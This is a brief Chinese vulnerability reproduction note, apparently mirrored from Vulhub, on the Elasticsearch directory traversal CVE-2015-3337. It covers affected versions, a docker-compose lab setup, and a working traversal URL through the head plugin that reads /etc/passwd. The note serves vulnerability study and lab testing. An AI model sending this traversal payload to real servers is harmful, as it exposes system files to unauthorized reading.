# (CVE-2015-3337)ElasticSearch 目录穿越漏洞
===
一、漏洞简介
————
在安装了具有”site”功能的插件以后,插件目录使用`../`即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。
二、漏洞影响
————
影响版本:1.4.5以下/1.5.2以下
三、复现过程
————
编译及运行测试环境
docker-compose build
docker-compose up -d
测试环境默认安装了一个插件:`elasticsearch-head`,主页在此:https://github.com/mobz/elasticsearch-head
访问`http://www.0-sec.org:9200/_plugin/head/../../../../../../../../../etc/passwd`读取任意文件(不要在浏览器访问):
![](/static/qingy/(CVE-2015-3337)ElasticSearch_目录穿越漏洞/img/rId24.png)
### head插件
head插件提供了elasticsearch的前端页面,访问
`http://www.0-sec.org:9200/_plugin/head/` 即可看到,不多说了。
参考链接
——–
> https://vulhub.org/\#/environments/elasticsearch/CVE-2015-3337/
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容